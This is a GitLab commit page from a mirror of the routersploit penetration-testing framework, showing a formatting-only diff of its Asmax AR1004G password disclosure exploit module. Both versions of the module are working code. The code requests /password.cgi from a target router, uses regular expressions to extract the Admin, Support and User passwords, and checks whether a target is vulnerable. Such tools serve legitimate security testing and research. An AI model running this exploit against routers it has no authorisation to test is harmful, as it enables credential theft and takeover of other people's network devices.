Skip to content
Projects
Groups
Snippets
Help
This project
Loading...
Sign in / Register
Toggle navigation
R
routersploit
Overview
Overview
Details
Activity
Cycle Analytics
Repository
Repository
Files
Commits
Branches
Tags
Contributors
Graph
Compare
Charts
Issues
0
Issues
0
List
Board
Labels
Milestones
Merge Requests
0
Merge Requests
0
CI / CD
CI / CD
Pipelines
Jobs
Schedules
Charts
Wiki
Wiki
Snippets
Snippets
Members
Members
Collapse sidebar
Close sidebar
Activity
Graph
Charts
Create a new issue
Jobs
Commits
Issue Boards
Open sidebar
czos-dpend
routersploit
Commits
d4fb4d39
Commit
d4fb4d39
authored
9 years ago
by
fwkz
Browse files
Options
Browse Files
Download
Email Patches
Plain Diff
Cosmetics and PEP8 fixes
parent
22327774
Hide whitespace changes
Inline
Side-by-side
Showing
1 changed file
with
26 additions
and
28 deletions
+26
-28
ar_1004g_password_disclosure.py
...it/modules/exploits/asmax/ar_1004g_password_disclosure.py
+26
-28
No files found.
routersploit/modules/exploits/asmax/ar_1004g_password_disclosure.py
View file @
d4fb4d39
...
...
@@ -18,52 +18,51 @@ class Exploit(exploits.Exploit):
"""
__info__
=
{
'name'
:
'Asmax AR1004G Password Disclosure'
,
'description'
:
'Exploits asmax password disclosure vulnerability that allows to fetch credentials for: Admin, Support and User accounts.'
,
'description'
:
'Exploits asmax password disclosure vulnerability that allows to '
'fetch credentials for: Admin, Support and User accounts.'
,
'authors'
:
[
'Marcin Bury <marcin.bury@reverse-shell.com>'
,
# routersploit module
],
'Marcin Bury <marcin.bury@reverse-shell.com>'
,
# routersploit module
],
'references'
:
[
'https://github.com/lucyoa/exploits/blob/master/asmax/asmax.txt'
],
'targets'
:
[
'Asmax AR 1004g'
]
'https://github.com/lucyoa/exploits/blob/master/asmax/asmax.txt'
,
],
'targets'
:
[
'Asmax AR 1004g'
,
]
}
target
=
exploits
.
Option
(
''
,
'Target address e.g. http://192.168.1.1'
)
# target address
port
=
exploits
.
Option
(
80
,
'Target port'
)
# default port
target
=
exploits
.
Option
(
''
,
'Target address e.g. http://192.168.1.1'
)
# target address
port
=
exploits
.
Option
(
80
,
'Target port'
)
# default port
def
run
(
self
):
creds
=
[]
url
=
sanitize_url
(
"{}:{}/password.cgi"
.
format
(
self
.
target
,
self
.
port
))
print_status
(
"Requesting for {}"
.
format
(
url
))
try
:
r
=
requests
.
get
(
url
)
res
=
r
.
text
response
=
requests
.
get
(
url
)
.
text
except
(
requests
.
exceptions
.
MissingSchema
,
requests
.
exceptions
.
InvalidSchema
):
print_error
(
"Invalid URL format:
%
s"
%
url
)
print_error
(
"Invalid URL format:
{}"
.
format
(
url
)
)
return
except
requests
.
exceptions
.
ConnectionError
:
print_error
(
"Connection error:
%
s"
%
url
)
print_error
(
"Connection error:
{}"
.
format
(
url
)
)
return
creds
=
[]
admin
=
re
.
findall
(
"pwdAdmin = '(.+?)'"
,
res
)
if
len
(
admin
):
admin
=
re
.
findall
(
"pwdAdmin = '(.+?)'"
,
response
)
if
admin
:
creds
.
append
((
'Admin'
,
admin
[
0
]))
support
=
re
.
findall
(
"pwdSupport = '(.+?)'"
,
res
)
if
len
(
support
)
:
support
=
re
.
findall
(
"pwdSupport = '(.+?)'"
,
res
ponse
)
if
support
:
creds
.
append
((
'Support'
,
support
[
0
]))
user
=
re
.
findall
(
"pwdUser = '(.+?)'"
,
res
)
if
len
(
user
)
:
user
=
re
.
findall
(
"pwdUser = '(.+?)'"
,
res
ponse
)
if
user
:
creds
.
append
((
'User'
,
user
[
0
]))
if
len
(
creds
)
:
if
creds
:
print_success
(
"Credentials found!"
)
headers
=
(
"Login"
,
"Password"
)
print_table
(
headers
,
*
creds
)
print_table
((
"Login"
,
"Password"
),
*
creds
)
else
:
print_error
(
"Credentials could not be found"
)
...
...
@@ -71,12 +70,11 @@ class Exploit(exploits.Exploit):
url
=
sanitize_url
(
"{}:{}/password.cgi"
.
format
(
self
.
target
,
self
.
port
))
try
:
r
=
requests
.
get
(
url
)
res
=
r
.
text
response
=
requests
.
get
(
url
)
.
text
except
:
return
None
# could not be verified
if
any
(
map
(
lambda
x
:
x
in
res
,
[
"pwdSupport"
,
"pwdUser"
,
"pwdAdmin"
])):
return
True
# target vulnerable
if
any
(
map
(
lambda
x
:
x
in
res
ponse
,
[
"pwdSupport"
,
"pwdUser"
,
"pwdAdmin"
])):
return
True
# target vulnerable
return
False
# target not vulnerable
This diff is collapsed.
Click to expand it.
Write
Preview
Markdown
is supported
0%
Try again
or
attach a new file
Attach a file
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Cancel
Please
register
or
sign in
to comment